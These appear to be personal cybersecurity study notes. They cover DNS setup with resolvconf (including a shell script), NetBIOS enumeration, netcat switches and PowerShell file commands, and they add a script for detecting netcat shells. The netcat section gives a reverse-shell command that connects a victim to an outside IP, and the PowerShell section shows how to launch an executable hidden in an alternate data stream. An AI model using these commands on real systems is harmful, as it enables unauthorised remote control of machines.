    • Scanning and Reconnaissance
      • nmap
    • Sniffing
      • Wireshark
    • SQL Injection
      • Sqlmap
    • Brute-forcing or Password Cracking
      • Hydra
      • John The Ripper
    • Cryptography
      • Md5sum
      • Veracrypt
    • Steganography
      • Open Stego
  • resolvconf

    • To point a host at custom name servers such as Cloudflare instead of the ones handed out by the access point
    • Installation
      • apt install resolvconf
    • systemctl enable resolvconf.service
      • To enable the service so that it runs on startup
    • systemctl start resolvconf.service
      • To use it right now
    • systemctl status resolvconf.service
      • To check that it is loaded and running
    • cat /etc/resolv.conf
      • To check which program is managing the file
    • vim /etc/resolvconf/resolv.conf.d/base
      • To put in the custom name servers
        • nameserver 1.1.1.1
          • Cloudflare
        • nameserver 8.8.8.8
          • Google (not recommended)
        • nameserver 8.8.4.4
          • Google (not recommended)
    • systemctl restart resolvconf.service
      • To restart the service so that it regenerates /etc/resolv.conf with the new name servers
    • systemctl restart NetworkManager
      • To make sure NetworkManager picks up the changes
    • If the above doesn’t work
      • vim /etc/network/interfaces
        • To configure DNS name servers manually
      • dns-nameservers 1.1.1.1 8.8.8.8 8.8.4.4
        • Add at the bottom of the file
      • systemctl restart resolvconf.service
      • systemctl restart NetworkManager
      • cat /etc/resolv.conf
      • If it is still not working
        • sudo reboot -f
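The whole resolvconf procedure above, as an added example script that is not part of the original notes: it generates the base file from a list of name servers, rejects malformed addresses (a trailing dot such as "8.8.4.4." is a common slip that makes the resolver silently ignore the entry), and verifies that the resulting resolv.conf really lists them. The file paths default to the ones in the notes but can be overridden through the RESOLV_BASE and RESOLV_CONF variables (both names are this example's own), so the generation and verification steps can be dry-run without root.

```shell
#!/bin/sh
# Added example (not from the original notes): build the resolvconf "base"
# file from a list of name servers and confirm the change took effect.
# RESOLV_BASE / RESOLV_CONF are this script's own override variables.

# Return 0 if $1 is a well-formed dotted-quad IPv4 address ("8.8.4.4." fails).
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    # Each octet must be in the range 0..255.
    octets=$(printf '%s\n' "$1" | tr '.' ' ')
    for octet in $octets; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Write "nameserver X" lines for every valid address in "$@" to the base file.
# Malformed entries are reported on stderr and skipped; fails if none remain.
write_base() {
    base=${RESOLV_BASE:-/etc/resolvconf/resolv.conf.d/base}
    : > "$base"
    count=0
    for ns in "$@"; do
        if is_ipv4 "$ns"; then
            printf 'nameserver %s\n' "$ns" >> "$base"
            count=$((count + 1))
        else
            printf 'skipping malformed name server: %s\n' "$ns" >&2
        fi
    done
    [ "$count" -gt 0 ]
}

# Print the name servers listed in a resolv.conf-style file ($1), one per line.
list_nameservers() {
    awk '$1 == "nameserver" { print $2 }' "$1"
}

# Return 0 only if every address in "$@" appears in the generated resolv.conf,
# i.e. the restart actually applied the new servers.
verify_resolv_conf() {
    conf=${RESOLV_CONF:-/etc/resolv.conf}
    for ns in "$@"; do
        list_nameservers "$conf" | grep -qx "$ns" || return 1
    done
    return 0
}

# Full procedure on a real system (needs root): write, restart, verify.
# Usage: . ./resolvconf_apply.sh; apply_resolvconf 1.1.1.1 8.8.8.8
apply_resolvconf() {
    write_base "$@" || return 1
    systemctl restart resolvconf.service && systemctl restart NetworkManager
    verify_resolv_conf "$@"
}
```

Running `apply_resolvconf` with the three addresses from the notes reproduces the edit-restart-check sequence; `verify_resolv_conf` is the scripted form of the final `cat /etc/resolv.conf` check and fails loudly when the base file was not picked up.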
  • NetBIOS

    • Network Basic Input/Output System (port 137) allows communication between computers on a local network.
    • Works fully only on Windows versions before Windows 7 and on servers.
      • It also works on newer versions but yields much less information.
    • Why do we need NetBIOS enumeration?
      • It reveals the group the computer belongs to, its shares (files shared on the network) and the computer name.
      • Nothing special, just how the network is configured or how the computers on it are configured.
    • nbtstat -A 192.168.1.108
      • nbtstat -r 192.168.1.0/24
        • -r : scan a range of IPs
      • nbtstat -v -r 192.168.1.103
        • -v : verbose
  • netcat
    • “It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain a Reverse Shell.”
    • Switches
      • -l : listen for an incoming connection rather than initiate a connection to a remote host
      • -v : verbose, to see who connected to you
      • -n : do not do any DNS or service lookups on any specified addresses, hostnames or ports
      • -p : specifies the source port nc should use, subject to privilege restrictions and availability
      • -u : connect to a UDP port
      • -e : specify which program to execute after you connect to a host
    • To connect back to our attacking machine (run on the victim machine): “nc 161.35.162.57 4444 -e /bin/sh”
    • To listen for the connection (run on the attacker machine): “nc -lvnp 4444” or “nc -l -v -n -p 4444”
    • To send the string hello to the service running on port 1234: “echo hello | nc <host> 1234” (replace <host> with the address of the machine running the service)
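The two switches that make netcat a reverse-shell tool (-l to wait for a connection, -e to hand a program to the socket) are also what a defender looks for in a process listing. As an added example that is not part of the original notes, the script below scans lines in `ps -eo pid,user,args` format and flags nc/ncat/netcat processes that are either listening or exec-bound; the sample listing is constructed, and the option names beyond the notes' own (--listen, --exec, -c, --sh-exec) are the ncat and nc.traditional spellings of the same behaviour.

```shell
#!/bin/sh
# Added example (not from the original notes): flag netcat invocations in a
# process listing that look like listeners or exec-bound shells.
# Input format: "ps -eo pid,user,args" lines; SAMPLE_PS is constructed.

SAMPLE_PS='  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
 1337 www-data nc 203.0.113.10 4444 -e /bin/sh
 1402 alice    nc -lvnp 4444
 1500 bob      ncat --exec /bin/bash -l 9001
 1611 alice    vim /etc/resolv.conf
 1700 carol    nc -z 10.0.0.5 80'

# Read ps lines on stdin; print "pid user reason args" for every netcat
# process that listens or executes a program on the connection.
flag_netcat() {
    while read -r pid user args; do
        # Skip the ps header and blank lines.
        case $pid in PID|'') continue ;; esac
        # Split the command line into words without glob expansion.
        set -f; set -- $args; set +f
        cmd=${1##*/}
        case $cmd in nc|ncat|netcat) ;; *) continue ;; esac
        shift
        reason=''
        for opt in "$@"; do
            case $opt in
                # A program attached to the socket: reverse or bind shell.
                -e|-c|--exec|--sh-exec) reason='exec-bound (program handed to the socket)' ;;
                # Listening: -l alone, or bundled as in -lvnp / -nlvp.
                --listen|-l*|-[a-zA-Z]*l*) [ -z "$reason" ] && reason='listener' ;;
            esac
        done
        [ -n "$reason" ] && printf '%s %s %s %s\n' "$pid" "$user" "$reason" "$args"
    done
    return 0
}

# Usage on a live system: ps -eo pid,user,args | flag_netcat
printf '%s\n' "$SAMPLE_PS" | flag_netcat
```

The exec-bound reason wins over "listener" when both apply (a bind shell is both), and a plain port check such as `nc -z host 80` is left alone, so the output is short enough to review by hand or to forward as an alert.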

  • PowerShell

    • To change directories: “Set-Location -Path c:”
    • To list the contents of the current directory: “Get-ChildItem -File -ErrorAction SilentlyContinue”
      • To look for a hidden directory with the recursion filter: “Get-ChildItem -Directory -Hidden -Recurse -Filter '3' -ErrorAction SilentlyContinue”
      • There are various other options we can use with this cmdlet to enhance its capabilities further.
        • -Path : specifies a path to one or more locations. Wildcards are accepted.
        • -File / -Directory : to get a list of files, use the File parameter; to get a list of directories, use the Directory parameter. You can use the Recurse parameter with the File and/or Directory parameters.
        • -Filter : specifies a filter to qualify the Path parameter.
        • -Recurse : gets the items in the specified locations and in all child items of the locations.
        • -Hidden : to get only hidden items, use the Hidden parameter.
        • -ErrorAction SilentlyContinue : specifies what action to take if the command encounters an error.
    • To read the contents of a file: “Get-Content -Path file.txt”
      • To get the number of words contained within a file: “Get-Content -Path file.txt | Measure-Object -Word”
      • To get the string at an exact position within the file: “(Get-Content -Path file.txt)[index]”. The index is the numerical value that is the location of the string within the file. Since indexes start at zero, you typically need to subtract one from the original value to extract the string at the correct position.
    • To search a particular file for a pattern we define: “Select-String -Path 'c:' -Pattern '*.pdf'”
    • To obtain more information about a specific cmdlet: “Get-Help Select-String”
    • To obtain the hash of a file: “Get-FileHash -Algorithm MD5 file.txt”
    • To locate the different streams of a file: “Get-Item -Path c:\file.exe -Stream *”
    • Strings tool to scan the mysterious executable: “c:\strings64.exe -accepteula file.exe”. Strings scans the file you pass it for strings of a default length of 3 or more characters. You can use the Strings tool to peek inside this mysterious executable file.
    • To launch the hidden executable hiding within ADS: “wmic process call create $(Resolve-Path file.exe:streamname)”